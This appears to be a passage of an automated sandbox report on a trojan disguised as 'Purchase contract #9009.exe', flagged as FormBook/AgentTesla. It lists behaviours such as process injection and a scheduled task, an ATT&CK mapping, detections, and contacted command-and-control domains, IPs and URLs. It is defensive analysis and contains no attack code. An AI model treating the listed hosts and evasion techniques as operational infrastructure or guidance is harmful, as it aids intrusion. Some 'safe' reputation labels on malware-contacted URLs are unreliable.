          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection712Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458959 Sample: Purchase contract #9009.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 42 www.ominvestment.net 2->42 44 www.backtothesimplethings.com 2->44 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 10 other signatures 2->68 11 Purchase contract #9009.exe 7 2->11         started        signatures3 process4 dnsIp5 52 192.168.2.1 unknown unknown 11->52 34 C:\Users\user\AppData\...\nzRFOjxWpomfsw.exe, PE32 11->34 dropped 36 C:\...\nzRFOjxWpomfsw.exe:Zone.Identifier, ASCII 11->36 dropped 38 C:\Users\user\AppData\Local\...\tmpC4FD.tmp, XML 11->38 dropped 40 C:\Users\...\Purchase contract #9009.exe.log, ASCII 11->40 dropped 78 Writes to foreign memory regions 11->78 80 Injects a PE file into a foreign processes 11->80 16 MSBuild.exe 11->16         started        19 schtasks.exe 1 11->19         started        file6 signatures7 process8 signatures9 54 Modifies the context of a thread in another process (thread injection) 16->54 56 Maps a DLL or memory area into another process 16->56 58 Sample uses process hollowing technique 16->58 60 2 other signatures 16->60 21 explorer.exe 16->21 injected 25 conhost.exe 19->25         started        process10 dnsIp11 46 www.5fashionfix.net 199.34.228.189, 49767, 80 WEEBLYUS United States 21->46 48 www.braun-mathematik.online 217.160.0.129, 49761, 80 ONEANDONE-ASBrauerstrasse48DE Germany 21->48 50 12 other IPs or domains 21->50 70 System process connects to network (likely due to code injection or exploit) 21->70 27 explorer.exe 21->27         started        signatures12 process13 signatures14 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76 30 cmd.exe 1 27->30         started        process15 process16 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase contract #9009.exe26%VirustotalBrowse
          Purchase contract #9009.exe37%ReversingLabsWin32.Trojan.AgentTesla
          Purchase contract #9009.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe37%ReversingLabsWin32.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.MSBuild.exe.3200000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.explorer.exe.180000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          9.2.explorer.exe.180000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://i2.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
          http://www.ascope.club/n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://www.founder.com.cn/cnL0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy0%Avira URL Cloudsafe
          http://www.carterandcone.comva0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.narrowpathwc.com/n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          www.narrowpathwc.com/n8ba/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.mtsnurulislamsby.com/High_Speed_Internet.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgie0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/Credit_Card_Application.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6R0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
          http://www.wintonplaceoh.com/n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.mtsnurulislamsby.com/Work_from_Home.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/10_Best_Mutual_Funds.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/display.cfm0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://www.lifestylebykendra.com/n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/Migraine_Pain_Relief.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi0%Avira URL Cloudsafe
          http://www.braun-mathematik.online/n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://www.5fashionfix.net/n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/~;0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.mtsnurulislamsby.com/fashion_trends.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://domain.idwebhosting.net/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderid=0%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.mtsnurulislamsby.com/px.js?ch=20%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://www.fontbureau.comcea0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.mtsnurulislamsby.com/Best_Penny_Stocks.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN10%Avira URL Cloudsafe
          http://i2.cdn-image.com/__media__/js/min.js?v2.20%URL Reputationsafe
          http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mtsnurulislamsby.com
          209.99.40.222
          truetrue
            unknown
            narrowpathwc.com
            160.153.136.3
            truetrue
              unknown
              teamtacozzzz.com
              34.102.136.180
              truefalse
                unknown
                lifestylebykendra.com
                34.102.136.180
                truefalse
                  unknown
                  www.backtothesimplethings.com
                  146.148.189.194
                  truefalse
                    unknown
                    www.5fashionfix.net
                    199.34.228.189
                    truetrue
                      unknown
                      ascope.club
                      95.215.210.10
                      truetrue
                        unknown
                        www.braun-mathematik.online
                        217.160.0.129
                        truetrue
                          unknown
                          wintonplaceoh.com
                          198.71.233.107
                          truetrue
                            unknown
                            www.ominvestment.net
                            unknown
                            unknowntrue
                              unknown
                              www.wintonplaceoh.com
                              unknown
                              unknowntrue
                                unknown
                                www.narrowpathwc.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.lifestylebykendra.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cypios.net
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.teamtacozzzz.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.ascope.club
                                        unknown
                                        unknowntrue
                                          unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.ascope.club/n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.narrowpathwc.com/n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          www.narrowpathwc.com/n8ba/true
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.wintonplaceoh.com/n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lifestylebykendra.com/n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhNfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.braun-mathematik.online/n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.5fashionfix.net/n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhNtrue
                                          • Avira URL Cloud: safe
                                          unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://i2.cdn-image.com/__media__/pics/12471/logo.png)explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designersGPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers/?Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/bThePurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.founder.com.cn/cnLPurchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers?Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVyexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.carterandcone.comvaPurchase contract #9009.exe, 00000001.00000003.642994387.00000000054C7000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://i2.cdn-image.com/__media__/pics/12471/libg.png)explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.tiro.comexplorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.goodfont.co.krPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comPurchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rexplorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sajatypeworks.comPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netDPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cn/cThePurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://fontfabrik.comPurchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
